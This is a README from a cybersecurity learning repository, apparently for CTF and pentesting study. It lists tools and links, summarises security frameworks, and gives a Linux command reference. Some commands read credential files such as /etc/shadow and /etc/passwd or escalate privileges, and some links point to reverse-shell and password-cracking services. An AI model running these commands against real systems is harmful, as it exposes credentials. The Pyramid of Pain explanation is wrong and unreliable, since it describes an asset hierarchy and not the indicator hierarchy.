AI Summary: The CyberSecurity repository offers a comprehensive collection of resources and tools aimed at individuals interested in cybersecurity, encompassing a wide range of topics from security models and threat identification to practical tools for ethical hacking. Notable features include a curated list of command-line and graphical user interface tools for pentesting, along with educational content covering ethical and legal aspects, security frameworks, and network fundamentals. This repository serves as a valuable reference for both newcomers and experienced professionals in the cybersecurity domain.

README

Remember to take a look at the /More folder! ;)

Thank you for exploring this project! I hope you will find the content valuable and perhaps even worth sharing with others. This project represents years of dedication, learning, and refinement, fueled by countless hours and cups of coffee ☕. If you’d like to support its continued growth, your contribution would be highly appreciated.

List of Contents

1. Links
2. CTF Sites
3. Books
4. Services
5. Terms
6. Principles and Standards
   1. Security Models
      1. CIA Triad
      2. DAD Triad
      3. The Bell-La Padula Model
      4. Biba Model
      5. Clark-Wilson Model
   2. Trust and Access Control
      1. Principles of Privileges
      2. Zero Trust versus Trust but Verify
   3. Threat Identification and Management
      1. Threat Modeling and Incident Response
      2. Vulnerability vs Threat vs Risk
      3. Threat intelligence Classifications
      4. Threat Intelligence Tools
      5. The Pyramid of Pain
   4. Ethical and Legal Aspects
   5. Security Assessment Frameworks and Methodologies
      1. Black, Grey, & White Box Testing
      2. OSSTMM
      3. OWASP
      4. NIST
      5. NCSC CAF
      6. MITRE ATT&CK
      7. Unified Kill chain
   6. Global Security Standards
      1. ISO/IEC 19249
      2. ISO27001
   7. Operational Roles and Career Development
7. Linux Commands
8. Tools (CLI)
   1. Aircrack-ng
   2. Gobuster
   3. Feroxbuster
   4. Hashcat
   5. Hydra
   6. John The Ripper
   7. Metasploit
   8. Netcat
   9. Nikto
   10. Nmap
   11. SQLMap
9. Tools (GUI)
   1. Autopsy
   2. Burp Suite
   3. Nessus
   4. Wireshark
10. Text Editors
    1. Nano
    2. VIM
11. Networking
    1. Internet Protocol (IP)
    2. The Router
    3. IPv4 Classes
    4. Subnetting
    5. Address Resolution Protocol (ARP)
12. Web Exploitation
    1. Content Discovery
    2. SQL Injection
    3. Command Injection
    4. Directory Traversal
    5. Authentication Bypass
    6. Insecure Direct Object Reference (IDOR)
    7. File Inclusion (LFI/RFI)
    8. Cross Site Request Forgery (CSRF)
    9. Cross Site Scripting (XSS)
    10. Server Side Request Forgery (SSRF)
    11. Server Side Template Injection (SSTI)
    12. Server Side Includes (SSI)
13. Digital Forensics
    1. File Analysis
    2. PCAP Analysis
    3. Steganography
    4. Memory Analysis
    5. Disk Imaging
14. Binary Exploitation
    1. Registers
    2. The Stack
    3. Calling Conventions
    4. Global Offset Table (GOT)
    5. Buffers and Buffer Overflows
    6. Return Oriented Programming (ROP)
    7. Binary Security
    8. The Heap and Exploitation
    9. Format String Vulnerability
    10. Integer Overflow
    11. ASLR Bypass
15. Reverse Engineering
    1. Assembly Language
    2. Disassemblers & Debuggers
    3. Decompilers
16. Cryptography
    1. Genating Keys
    2. Cryptographic Methods
    3. Encoding
    4. Hashing
    5. Ciphers
    6. Encryption (RSA)
17. Windows Exploitation
    1. Active Directory
    2. Windows Reverse Shells
    3. Samba (SMB)
18. Shells and Privilege Escalation
    1. TTY Shell
    2. Privilege Escalation
19. Vulnerabilities & Threats
    1. Social Engineering
    2. Denial of Service (DoS)
    3. Misconfigurations
20. Miscellaneous

Links

Abuse.ch - a collection of malware and threat intelligence feeds.
Ahmia - search engine for hidden services on the Tor network
AI Generated Photos - 100.000 AI generated faces.
Aperisolve - all in one steganography analysis
Archive.org - internet Archieve
ASCII Converter - Hex, decimal, binary, base64, and ASCII converter
Assembly Tutorials - assembly tutorials
Base64 Decodr/Encoder - base64 decoder/encoder
Bcrypt Generator - a simple bcrypt generator
Bug Bounty - a list of bug bounty programs
Can I use - provides up-to-date browser support tables for support of front-end web technologies.
Censys - search engine for internet connected devices
Cheatography - over 3,000 free cheat sheets, revision aids and quick references.
CodeBeautify - code Beautifier, Viewer and converter
Common ports - a lists of the most common ports
Cipher Identifier - cipher identifier
Convert Binary - a wide range of different converters for binary numbers
Convertcsv - convert SQL to CSV
Crackstation (Rainbow tables) - hash cracker
CSS Reference - CSS reference
CVECrowd - a platform for sharing and discussing cybersecurity vulnerabilities.
CVE Details - CVE security vulnerability advanced database.
CVE Mitre - list of publicly known cybersecurity vulnerabilities.
CVS - Scoring System Calculator
CyberChef - a web app for encryption, encoding, compression and data analysis.
Cybercrime Tracker - monitors and tracks various malware families that are used to perpetrate cyber crimes.
crt.sh - Certificate Transparency Log Search Engine for subdomain enumeration.
CTF 101 - learn the different CTF topics in cybersecurity
CTF Cryptography - ctf cryptography for beginners
dCode - dcode.fr has many decoders for a lot of ciphers
dehashed - is a hacked database search engine.
Diff Checker - compare images
DNSDumpster - free domain research tool that can discover hosts related to a domain
DogBolt - decompiler explorer
EmailHippo - a free email verification tool.
Emkei - fake mail generator
Explain Shell - a tool to help you understand shell commands.
ExploitDB - searchable archive from The Exploit Database.
fakenamegenerator - your randomly generated identity.
Feodo Tracker - a project by abuse.ch tracking the C2 infrastructure of the Feodo Tracker Botnet.
File Signature - a table of file signatures (aka “magic numbers”)
File Signature Wiki - another list of file signatures (aka “magic numbers”)
Forensically - a tool to analyze images.
Godbolt - compiler explorer
Google advanced search - google dorking made easy
Google Hacking Database - juicy information found by dorking
GTFOBins - list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
HackerOne - HackerOne is a vulnerability coordination and bug bounty platform.
Hacking Glossary - a glossary of hacking terms made by HackTheBox.
Hash Analyzer - tool to identify hash types
Hash Identifier - hash identifier using CyberChef
have i been pwned? - check if you have an account that has been compromised in a data breach.
HexEd - HexEd is a powerful online hex editor running in your web browser
hilite.me - converts your code snippets into pretty-printed HTML formats
HSV to RGB - HSV to RGB color converter
HTML Reference - HTML reference
HTTrack - website copier
Hunter.io - find email addresses in seconds.
Image Color Picker - select a color and get the HTML Color Code of this pixel
Intelix - Search Tor, I2P, data leaks and the public web by email, domain, IP, CIDR, Bitcoin address and more.
JoomScan - Joomla Vulnerability Scanner
k8s-security - kubernetes security notes and best practices.
Kali Linux Tutorials - Kali Linux Tutorials
Keybase - it’s open source and powered by public-key cryptography.
LFI - learn about local file inclusion
Linux Commands - a list of linux commands
malc0de - malware search engine.
Malware Bazaar - malware search engine.
MD5 Online - md5Online offers several tools related to the MD5 cryptographic algorithm.
Morse Code Translator a morse code translator
Morse Code Adaptive Audio Decoder - a morse code adaptive audio decoder
Morse Code Audio Decoder - a morse code audio decoder
Morse Code Sound & Vibration Listener - a morse code sound & vibration listener
Namechk - check if your desired username is available on over 500 social networks (username OSINT).
NerdyData - the search engine for source code
ntlm.pw - NTLM password cracker
Observatory by Mozilla- set of tools to analyze your website.
Office Recovery - repair corrupt JPEG, PNG, GIF, BMP, TIFF, and RAW images.
PDF24 - free and easy to use online PDF tools
Phishtool - PhishTool is a free phishing simulation tool.
NPiet - Piet is an esoteric programming language based of using colored pixels to represent commands.
Ping.eu - online Ping, Traceroute, DNS lookup, WHOIS and others.
pipl - is the place to find the person behind the email address, social username or phone number.
Pixrecovery - repair corrupt JPEG, PNG, GIF, BMP, TIFF, and RAW images.
Rapid7 - vulnerability and exploit database.
Regex101 - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.
RegEx Pal - online regex testing tool + other tools.
RegExr - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).
Revshell - reverse shell generator.
RequestBin - RequestBin gives you a URL that collects requests so you can inspect them in a human-friendly way
RGBA Color Picker - an RGBA color picker
ShellCheck - finds bugs in your shell scripts.
Shodan - learn various pieces of information about the client’s network, without actively connecting to it.
sploitus - the exploit and tools database.
SRI Hash Generator - Subresource Integrity (SRI) Hash Generator
SSL Scanner - analyze website security.
SSL Scan - sslscan tests SSL/TLS enabled services to discover supported cipher suites
Steganographic Decoder - decodes the payload that was hidden in a JPEG image or a WAV or AU audio file
Stego Tricks - learn stego tricks
Subnet Calculator - IPv4 to IPv6 subnet calculator
Subnet Cheatsheet - subnet cheatsheet
SSL Blacklist - a free SSL blacklist that can be used to detect malicious SSL certificates.
Tabulate - create clean looking tables
Talos Intelligence - threat intelligence from Cisco.
Threat Fox - a resource for sharing indicators of compromise (IOCs).
TIO - TIO is a free online interpreter, compiler and REPL.
URL Haus - a project by abuse.ch to collect and classify malicious URLs.
urlscan.io - service to scan and analyse websites.
urlvoid - this service helps you detect potentially malicious websites.
User-Agent Switcher switch and manage user agents
Vega - web security scanner and web security testing platform
ViewDNS - one source for free DNS related tools and information.
VirusTotal - analyze suspicious files and URLs to detect types of malware.
Visual Subnet Calculator - a visual subnet calculator
WebToolHub-LE - HTML hyperlink extractor
WebToolHub - lots of different web tools
WhatsMyName - social media username enumeration
WHOIS lookup - best whois lookup
Wigle - is a website for collecting information about the different wireless hotspots around the world
WPScan - WordPress security scanner

CTF Sites

TryHackMe - TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs.
HackTheBox - HackTheBox is a massive, online cybersecurity practical training platform.
CTFLearn - An online platform built to help ethical hackers learn, practice, and compete.
Challenges - Reverse engineering CTF training platform
Cryptohack - Cryptography learning platform.
Root Me - Root Me is a platform for everyone to test and improve knowledge in computer security and hacking.
ROP Emperium - ROP Emporium is a series of challenges based around Return Oriented Programming (ROP).
pico CTF - picoCTF is a free computer security game targeted at middle and high school students.

Books

• Penetration Testing
• Linux Basics for Hackers
• The Linux Command Line and Shell Scripting Bible
• Black Hat Python
• The Hacker PlayBook 2 & 3
• Hacker Methodology Handbook
• Gray Hat Hacking
• Red Team Field Manual
• Metasploit
• The Web Application Hacker’s Handbook
• Real-World Bug Hunting
• Attacking Network Protocols

Services

A variety of services that can be useful for cybersecurity professionals.

Network security

An Intrusion Detection and Prevention System (IDPS) or simply Intrusion Prevention System (IPS) is a system that can detect and prevent network intrusions. IDS setups can be divided based on their location in the network into:

Host-based IDS (HIDS): Installed on an OS to monitor inbound/outbound host traffic and running processes.

Network-based IDS (NIDS): A dedicated device or server monitoring network traffic via a switch’s monitor port to detect malicious activity across the network or VLANs.

VPN Providers

A Virtual Private Network (VPN) encrypts your internet connection to protect your privacy and security.

Some of these providers are:

• IVPN
• Mullvad
• ProtonVPN

VPS Providers

A Virtual Private Server (VPS) is an isolated environment created on a physical server using virtualization technology.

Some of these providers are:

• Vultr
• Linode
• DigitalOcean
• OneHostCloud

Terms

Forms of Malwares/Attacks

There are several types of malware and attacks that can compromise systems and data. Here are some common ones.

Principles and Standards

Security Models

CIA Triad

CIA Triad is a model designed to guide policies for information security within an organisation. It consists of three core principles being: Confidentiality, Integrity, and Availability.

• Confidentiality ensures that only the intended persons or recipients can access the data.
• Integrity aims to ensure that the data cannot be altered; moreover, we can detect any alteration if it occurs.
• Availability aims to ensure that the system or service is available when needed.

DAD Triad

The security of a system is attacked through one of several means. It can be via the disclosure of secret data, alteration of data, or destruction of data. It is the opposite of the CIA triad.

• Disclosure: Unauthorized access to information. Is the opposite of confidentiality.
• Alteration: Unauthorized changes to information. Is the opposite of Integrity
• Destruction: Unauthorized or intentional destruction of information. Is the opposite of Availability

Protecting against disclosure, alteration, and destruction/denial is very important, as this protection is equivalent to working to maintain confidentiality, integrity and availability.

The Bell-La Padula Model

The Bell-LaPadula Model aims to achieve confidentiality by specifying three rules:

1. Simple Security Property: This property is referred to as “no read up”; it states that a subject at a lower security level cannot read an object at a higher security level. This rule prevents access to sensitive information above the authorized level.
2. Star Security Property: This property is referred to as “no write down”; it states that a subject at a higher security level cannot write to an object at a lower security level. This rule prevents the disclosure of sensitive information to a subject of lower security level.
3. Discretionary-Security Property: This property uses an access matrix to allow read and write operations. An example access matrix is shown in the table below and used in conjunction with the first two properties.

The first two properties can be summarized as “write up, read down.” You can share confidential information with people of higher security clearance (write up), and you can receive confidential information from people with lower security clearance (read down).

Limitation: It was not designed to handle file-sharing.

Biba Model

The Biba Model aims to achieve integrity by specifying two main rules

1. Simple Integrity Property: This property is referred to as “no read down”; a higher integrity subject should not read from a lower integrity object.
2. Start Integrity Property: This property is referred to as “no write up”; a lower integrity subject should not write to a higher integrity object.

Limitation: Does not handle internal threats (insider threat).

Clark-Wilson Model

The Clark-Wilson Model also aims to achieve integrity by using the following concepts:

• Constrained Data Item (CDI): This refers to the data type whose integrity we want to preserve.
• Unconstrained Data Item (UDI): This refers to all data types beyond CDI, such as user and system input.
• Transformation Procedures (TPs): These procedures are programmed operations, such as read and write, and should maintain the integrity of CDIs.
• Integrity Verification Procedures (IVPs): These procedures check and ensure the validity of CDIs.

Trust and Access Control

Principles of Privileges

It is vital to administrate and correctly define the various levels of access to an individuals require. These levels are determined on two primary factors:

1. The individual’s role/function within the organisation
2. The sensitivity of the information being stored on the system

When managing access rights, two crucial concepts are used: Privileged Identity Management (PIM) and Privileged Access Management (PAM).

• PIM is used to translate a user’s role within an organisation into an access role on a system.
• PAM is the management of the privileges a system’s access role has, amongst other things.

What is essential when discussing privilege and access controls is the principle of least privilege. Simply, users should be given the minimum amount of privileges, and only those that are absolutely necessary for them to perform their duties.

Zero Trust versus Trust but Verify

Trust in cybersecurity is addressed through two key principles:

1. Trust but Verify: Verify the actions of trusted entities through automated security mechanisms like logs and intrusion detection.
2. Zero Trust: Assume no trust and require authentication and authorization for all access, reducing the potential impact of breaches. Implementations like microsegmentation enhance security.

Threat Identification and Management

Threat Modeling and Incident Response

Threat modelling is the process of reviewing, improving, and testing the security protocols in place in an organisation’s information technology infrastructure and services.

This process is very similar to a risk assessment made in workplaces for employees and customers. The principles all return to:

Preparation -> Identification -> Mitigations -> Review

It is, however, a complex process that needs constant review and discussion with a dedicated team. An effective threat model includes:

• Threat intelligence
• Asset identification
• Mitigation capabilities
• Risk assessment

To help with this, there are frameworks such as STRIDE (Spoofing identity, Tampering with data, Repudiation threats, Information disclosure, Denial of Service and Elevation of privileges) and PASTA (Process for Attack Simulation and Threat Analysis)

Vulnerability vs Threat vs Risk

1. Vulnerability: Vulnerabilities are weaknesses that can be exploited.
2. Threat: A threat represents the possibility of harm resulting from the exploitation of a vulnerability.
3. Risk: Concerned with the likelihood of a threat actor exploiting a vulnerability and the potential impact on the business. Risk assessment involves evaluating the probability and consequences of security incidents.

Threat intelligence Classifications

Threat Intel is geared towards understanding the relationship between your operational environment and your adversary. With this in mind, we can break down threat intel into the following classifications:

• Strategic Intel: High-level intel that looks into the organisation’s threat landscape and maps out the risk areas based on trends, patterns and emerging threats that may impact business decisions.
• Technical Intel: Looks into evidence and artefacts of attack used by an adversary. Incident Response teams can use this intel to create a baseline attack surface to analyse and develop defence mechanisms.
• Tactical Intel: Assesses adversaries’ tactics, techniques, and procedures (TTPs). This intel can strengthen security controls and address vulnerabilities through real-time investigations.
• Operational Intel: Looks into an adversary’s specific motives and intent to perform an attack. Security teams may use this intel to understand the critical assets available in the organisation (people, processes, and technologies) that may be targeted.

Threat intelligence Tools

• Using UrlScan.io to scan for malicious URLs.
• Using Abuse.ch to track malware and botnet indicators.
• Investigate phishing emails using PhishTool.
• Using Cisco’s Talos Intelligence platform for intel gathering.

The Pyramid of Pain

The Pyramid of Pain is a cybersecurity concept that refers to a hierarchy of assets within an organization that, if compromised, would cause the most significant harm. The pyramid’s height represents the level of harm caused by a security breach, with the most critical assets at the top and less critical assets at the bottom.

The idea is that organizations should focus their cybersecurity efforts on the assets at the top of the pyramid to prevent the most significant damage from a security breach. The components of the Pyramid of Pain may vary depending on the organization and its specific needs, but typically include sensitive data, critical infrastructure, key personnel, and reputation.

Ethical and Legal Aspects

Governance & Regulation

• Governance: Managing and directing an organisation or system to achieve its objectives and ensure compliance with laws, regulations, and standards.
• Regulation: A rule or law enforced by a governing body to ensure compliance and protect against harm.
• Compliance: The state of adhering to laws, regulations, and standards that apply to an organisation or system.

Benefits include better security posture, stakeholder confidence, regulatory compliance, alignment with business objectives, informed decision-making, and competitive advantage.

Developing Governance Documents

Developing governance documents can involve the following steps:

1. Identify Scope and Purpose: Define what the document will cover and its necessity.
2. Research and Review: Investigate laws, regulations, and best practices to make the document comprehensive.
3. Draft the Document: Create an actionable, specific draft aligned with organizational goals.
4. Review and Approval: Involve stakeholders for feedback and final approval.
5. Implementation and Communication: Distribute the document and educate employees.
6. Review and Update: Regularly update the document for relevance and compliance.

Information Security Frameworks

Policies: Formal statements that set organizational goals and how to achieve them.
Standards: Specific requirements for processes, products, or services.
Guidelines: Non-mandatory recommendations for achieving objectives.
Procedures: Step-by-step instructions for specific tasks.
Baselines: Minimum security standards that must be met.

Preparing a Password Policy - Real-world Scenario

Let’s take a real-world scenario of preparing a password policy.

• Define Requirements: Set rules for password length, complexity, and expiration.
• Usage Guidelines: Specify unique passwords for each account and prohibit sharing.
• Storage and Transmission: Use encryption and secure connections.
• Change and Reset Guidelines: Define how often to change passwords.
• Communication and Monitoring: Educate employees and monitor compliance.

Making an Incident Response Procedure - Real-world Scenario

Now, let’s take a real-world scenario of making an incident response procedure.

• Define Incident Types: Categorize incidents like unauthorized access or data breaches.
• Roles and Responsibilities: Identify key stakeholders.
• Detailed Steps: Create a step-by-step guide for each incident type.
• Reporting and Documentation: Keep records for future reference.
• Communication and Review: Make sure procedures are understood and periodically updated.

Penetration Tests

Before a penetration test starts, a formal discussion occurs between the penetration tester and the system owner. Various tools, techniques, and systems to be tested are agreed on. This discussion forms the scope of the penetration testing agreement and will determine the course the penetration test takes.

Rules of Engagement (ROE)

The ROE is a document that is created at the initial stages of a penetration testing engagement. This document consists of three main sections:

• Permission
• Test scope
• Rules

Security Assessment Frameworks and Methodologies

Penetration Testing Methodologies

The steps a penetration tester takes during an engagement is known as the methodology. All of them have a general theme of the following stages:

Black, Grey & White Box Testing

There are three primary scopes when testing an application or service.

OSSTMM

The Open Source Security Testing Methodology Manual provides a detailed framework of testing strategies for systems, software, applications, communications and the human aspect of cybersecurity.

OWASP

OWASP, the Open Web Application Security Project, is a nonprofit foundation that works to improve software security. It provides free, openly available articles, methodologies, documentation, tools, and technologies in the field of web application security.

OWASP is known for its widely-referenced OWASP Top 10, a standard awareness document for developers and web application security that lists the most critical security risks to web applications.

NIST Cybersecurity Framework 2.0

The NIST Cybersecurity Framework is a popular framework used to improve an organisations cybersecurity standards and manage the risk of cyber threats.

The framework is divided into six core functions:

• Govern: Establish oversight to manage and reduce cybersecurity risks across the organization.
• Identify: Understand your systems, assets, and risks.
• Protect: Implement safeguards to ensure services’ security.
• Detect: Identify cybersecurity threats and breaches in real-time.
• Respond: Take action when cybersecurity events are detected.
• Recover: Restore operations and improve resilience post-incident.

NCSC CAF

The NCSC Cyber Assessment Framework (CAF) is a structured guide designed to ensure the security of organizations, particularly those part of the Critical National Infrastructure.

The CAF aligns with NIS regulations and is structured around 14 objectives, categorized into four main goals: managing security risk, protecting against cyber attacks, detecting cybersecurity events, and minimizing the impact of incidents. It provides comprehensive indicators of good practice for organizations to assess and improve their security posture

Mitre ATT&CK

The MITRE ATT&CK framework is a knowledge base of adversary tactics and techniques based on real-world observations. It is used as a foundation for the development of specific threat models and methodologies in the private sector, government, and the cybersecurity product and service community.

Unified Kill Chain

The Unified Kill Chain is a framework that combines the Lockheed Martin Cyber Kill Chain and the MITRE ATT&CK framework to provide a comprehensive view of the cyber kill chain. It is designed to help organizations understand and respond to cyber threats more effectively.

The Unified Kill Chain consists of the following stages:

1. Reconnaissance: Gathering information about the target.
2. Weaponization: Developing or obtaining the tools needed to exploit vulnerabilities.
3. Delivery: Delivering the weaponized payload to the target.
4. Exploitation: Exploiting vulnerabilities to gain access to the target.
5. Installation: Installing malware or other tools to maintain access to the target.
6. Command and Control: Establishing communication channels to control the compromised system.
7. Actions on Objectives: Achieving the attacker’s goals, such as stealing data or disrupting operations.

See the 18 phases of attack here.

Global Security Standards

ISO/IEC 19249

ISO/IEC 19249 outlines architectural and design principles for creating secure IT products and systems

1. Least Privilege: This principle emphasizes providing the minimum permissions necessary for individuals or entities to perform their tasks. (Design Principle: 1)
2. Attack Surface Minimization: It focuses on reducing the potential points of attack by eliminating unnecessary services and reducing vulnerabilities. (Design Principle: 2)
3. Centralized Parameter Validation: This principle suggests centralizing the validation of input parameters to prevent threats that may exploit vulnerabilities. (Design Principle: 3)
4. Centralized General Security Services: It advocates for centralizing security services such as authentication to enhance control and reduce potential points of failure. (Design Principle: 4)
5. Preparing for Error and Exception Handling: This principle emphasizes designing systems to handle errors and exceptions gracefully and securely, ensuring they do not leak sensitive information. (Design Principle: 5)

The five architectural principles outlined in ISO/IEC 19249:

1. Domain Separation: Components are grouped into distinct entities, each with its own domain and set of security attributes. This separation helps control access and privileges. (Architectural Principle: 1)
2. Layering: The system is structured into abstract levels or layers, enabling the imposition of security policies at different levels and facilitating validation of system operations. (Architectural Principle: 2)
3. Encapsulation: Involves hiding low-level implementations and preventing direct manipulation of data by providing specific methods, similar to object-oriented programming, to ensure data integrity. (Architectural Principle: 3)
4. Redundancy: Ensures availability and integrity by implementing redundancy measures. Examples include redundant power supplies or RAID configurations in data storage. (Architectural Principle: 4)
5. Virtualization: Sharing a single set of hardware among multiple operating systems, which enhances security boundaries and containment of malicious programs, particularly relevant in the context of cloud services. (Architectural Principle: 5)

ISO27001

ISO (the International Organization for Standardization) is a worldwide federation of national standards bodies (ISO member bodies), where ISO27001 is an international standard on how to manage information security.

An ISMS consists of the policies, procedures, guidelines, and associated resources and activities, collectively managed by an organization, in the pursuit of protecting its information assets.

It is a systematic approach for establishing, implementing, operating, monitoring, reviewing, maintaining and improving an organization’s information security to achieve business objectives. It is based on a risk assessment and the organization’s risk acceptance levels designed to effectively treat and manage risks.

Operational Roles and Career Development

Hat Categories

Hackers are sorted into three hats, where their ethics and motivations behind their actions determine what hat category they are placed into.

Career paths

Linux Commands

Essential command-line tools for cybersecurity work as well as some other external tools that are useful for various tasks.

File & Directory Management

In this section: pwd, ls, tree, mkdir, touch, cat, stat, mv, rm, ln (symbolic links), apt, Operators, File Descriptors

pwd

ls 

tree -a 

mkdir <name>

touch <filename>

cat file.txt            # Show file contents
cat -b file.txt         # Show line numbers for non-blank lines (-n for all)

stat file.txt

mv source.txt destination.txt  # Rename a file
mv file.txt /tmp               # Move a file to another directory

rm file.txt       # Remove a file
rm -r directory/  # Remove a directory and its contents
rm -rf /tmp/*     # Remove all files in /tmp directory

ln -s /root/flag.txt flag

cat flag 

sudo apt update                 # Update the package list
sudo apt upgrade                # Upgrade installed packages
sudo apt full-upgrade           # Full upgrade (may remove packages if necessary)
sudo apt install <package_name> # Install a package
sudo apt remove <package_name>  # Remove a package
sudo apt autoremove             # Remove unused packages
sudo apt list --installed       # List installed packages

find /etc/ -name shadow 2>/dev/null 

find /etc/ -name shadow 2> stderr.txt 1> stdout.txt

User & Permission Management

In this section: whoami, adduser & addgroup, chmod, chown, sudo

whoami

usermod -a -G groupname username

chmod <permissions> <file>

chmod u+x file.txt

chown <user>:<group> <file>

# Example
chown root:admin file.txt  # Change owner to root and group to admin

sudo [options] command

# Example usage
sudo ls /root           # List files in the /root directory as root user
sudo -u <user> command  # Run a command as a different user
sudo su                 # Switch to root user
sudo -l                 # List current sudo privileges

Process & System Monitoring

In this section: ps, top, htop, lsof, kill, free, df, du, ncdu, history, uname

ps aux 

# PID = Process ID
# TTY = Terminal type
# TIME = CPU time used by the process
# CMD = Command that launched the process

top

htop -d 10    # Show processes with a delay of 10 tenths of seconds
htop -u john  # Show processes owned by a specific user e.g. john

lsof /etc/passwd        # Show processes using the /etc/passwd file
lsof -i :80             # Show processes using port 80 (HTTP)
lsof -i | grep openvpn  # Show openvpn processes

kill <PID>          # Terminate a process by PID
kill -9 <PID>       # Forcefully terminate a process by PID

free -h 

df -h     # Show disk space usage in human-readable format  
df -i     # Show inode usage
df -BG    # Show disk space usage in gigabytes

du -sh BreachCompilation  # Show total size of the BreachCompilation directory

ncdu -x --si <file_or_directory>

history 

uname -a 

neofetch

File Inspection & Forensics

In this section: file, strings, exiftool, hexdump, xxd, objdump, hexeditor, binwalk

file <file_name>

strings [options] <file>

# Example usage
strings -a file.bin  # Extract all printable strings from file.bin

exiftool [options] <file>

# To view metadata of a file
exiftool file.jpeg 

 # Remove all metadata from the file
exiftool -all= file.jpeg

# To add GPS metadata to an image
exiftool \
-GPSLatitude=51.500718 \
-GPSLatitudeRef=N \
-GPSLongitude=-0.124614 \
-GPSLongitudeRef=W \
-file image.png

# To add a comment to an image
exiftool -Comment="London trip." image.png

# To add a user comment to an image
exiftool -UserComment="Super cool!" image.png

hexdump [options] {files}

# Example usage
hexdump -C file.txt

xxd [options] [infile [outfile]]

# Example usage
xxd -p file.txt  # Convert file.txt to plain hex dump

objdump [options] <file>

# Dumps the disassembly of the file
objdump -d file 

# Get the return address  
objdump -d file | grep ret

hexeditor [options] <file>

# Example usage
hexeditor -n file.txt

binwalk [options] <file>

# Example usage
binwalk -e firmware.bin # Extract files from firmware.bin
binwalk -Me firmware.bin # Recursively scan extracted files (matryoshka)

Searching & Text Processing

In this section: find, where, locate, whatis, apropos, grep, uniq, sort, diff, tail/head, wc, cut, tr, column, jq, sed, awk

find / -name "*.txt"                    # Find all .txt files in the specified path
find / -group users -type f              # Find files owned by the 'users' group
find / -type f -name "passwords.txt"    # Find a specific file by name
find / -name "*.txt"                    # Find any file with the extension .txt
find / -type d -name "backup"           # Find directories named "backup"
find / -type f -perm 644                # Find files with specific permissions (e.g., 644)
find / -type f -user root               # Find files owned by the root user
find / -type f -size +1M                # Find files larger than 1 megabyte

#Find config files larger than 25KB and newer than a specific date
find / -type f -size +25k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null 

where <command>

locate <file_name>

whatis <command>

apropos hexeditor       # Search for commands related to hex editors

# Basic usage
grep "search_term" file.txt  # Search for a specific term in a file

# ----- Example usage -----
# Search for a specific term in a file and show line numbers
grep -n "search_term" file.txt  

# Search recursively in all files in a directory
grep -R "search_term" /path/to/directory  # or '.' for current directory

# Search for an ip using regular expressions  
`grep -Eo '[0–9]{1,3}\.[0–9]{1,3}\.[0–9]{1,3}\.[0–9]{1,3}'`  

# Search for binaries (ex. "/usr/bin/sudo")  
`grep '^/.../.../....$'` 

# Grep for CTF flag version 1  
`grep -oi '\S*flag\S*' <path>`

# Grep for CTF flag version 2  
`grep "flag{.*}"`

uniq file.txt # Remove duplicate lines from file.txt
uniq -c file.txt # Count occurrences of each line
uniq -d file.txt # Print only duplicate lines
uniq -u file.txt # Print only unique lines

sort file.txt                 # Sort lines in file.txt
sort -r file.txt              # Sort lines in reverse order
sort -n file.txt              # Sort lines numerically
sort -u file.txt              # Sort lines and remove duplicates
sort -b file.txt              # Ignore leading blanks
sort -o sorted.txt file.txt   # Sort lines and write output to sorted.txt

diff file1.txt file2.txt  # Compare two files
diff -u file1.txt file2.txt  # Unified diff format
diff -i file1.txt file2.txt  # Ignore case differences
diff -w file1.txt file2.txt  # Ignore all white space

head file.txt          # Show the first 10 lines of file.txt
tail file.txt          # Show the last 10 lines of file.txt

head -n 5 file.txt     # Show the first 5 lines of file.txt
tail -n 5 file.txt     # Show the last 5 lines of file.txt

# Live tailing of a file
tail -f file.txt       # Follow the file and display new lines as they are added

# Sorting
head -n 20 file.txt | sort -r  # Show the first 20 lines and sort them in reverse order

wc file.txt

cut <OPTION> <FILE>

# Extract the first field from a file using ':' as a delimiter
cut -d':' -f1 /etc/passwd  

tr [options] SET1 [SET2]

# Replace all occurrences of ':' with ' '
tr ':' ' ' < file.txt

# Delete all digits from a file
tr -d '0-9' < file.txt

# Squeeze repeated spaces into a single space
tr -s ' ' < file.txt

# Convert lowercase letters to uppercase
tr 'a-z' 'A-Z' < file.txt

column -t file.txt

# Format output from a command into columns
echo -e "Name:Age\nAlice:30\nBob:25" | column -t

jq <options> <filter> <input>

# Prettify JSON data
jq . sample.json 

# Another way of prettifying JSON data (most common)
cat sample.json | jq

# Minify JSON data
jq -c < pretty.json  # Minify JSON data from pretty.json

# Replace the first occurrence of 'pattern' with 'replacement' in file.txt
sed 's/pattern/replacement/' file.txt

# Replace all occurrences of 'pattern' with 'replacement'
sed 's/pattern/replacement/g' file.txt

# Format trailing space with a colon  
sed 's/ */:/g' file.txt

# Only get alphanumeric values  
sed 's/[[:digit:]]//g' file.txt

# Print the first and second fields of each line in file.txt
awk '{print $1, $2}' file.txt 

# Print the first and third fields of /etc/passwd
awk -F: '{print $1, $3}' /etc/passwd 

# Split on space
awk -F: '{RS=" "} {print $1}'

# Print the first and third field of the /etc/passwd file
awk -F: '{print $1, $3}' /etc/passwd

# Print the first and third field of a file, split on "o" and print the total number of rows
awk 'BEGIN {FS="o"} {print $1,$3} END{print "Total Rows=",NR}' 

# Print the first and fourth field of file and print as "Name:ID"
awk 'BEGIN {FS=" "; OFS=":"} {print $1,$4}' file.txt
ippsec:34024
john:50024
thecybermentor:25923
liveoverflow:45345
nahamsec:12365
stok:1234

# Print the first field of a file and separate with a comma
awk 'BEGIN {ORS=","} {print $1}' file.txt
ippsec,john,thecybermentor,liveoverflow,nahamsec,stok

Networking Tools

In this section: ip, ping, traceroute, telnet, curl, wget, ftp, ssh, scp, xfreerdp, netdiscover, netstat, ss, tcpdump, dig, wash, whatweb

ip [options] object {command | help}

# Show all network interfaces
ip addr show

# Show a specific network interface
ip addr show <interface_name>

# Show routing table
ip route show

# Show ARP table
ip neigh show

# Show all network interfaces and their status  
ip link show

# Bring up a network interface
ip link set <interface_name> up

# Bring down a network interface
ip link set <interface_name> down

# Add a new IP address to an interface
ip addr add <ip_address>/<subnet_mask> dev <interface_name>

# Delete an IP address from an interface
ip addr del <ip_address>/<subnet_mask> dev <interface_name>

# Add a new route
ip route add <destination_network>/<subnet_mask> via <gateway_ip> dev <interface_name>

# Delete a route
ip route del <destination_network>/<subnet_mask> via <gateway_ip> dev <interface_name>

ping <IP_or_hostname>  

# Example usage
ping 8.8.8.8             # Ping Google's public DNS server
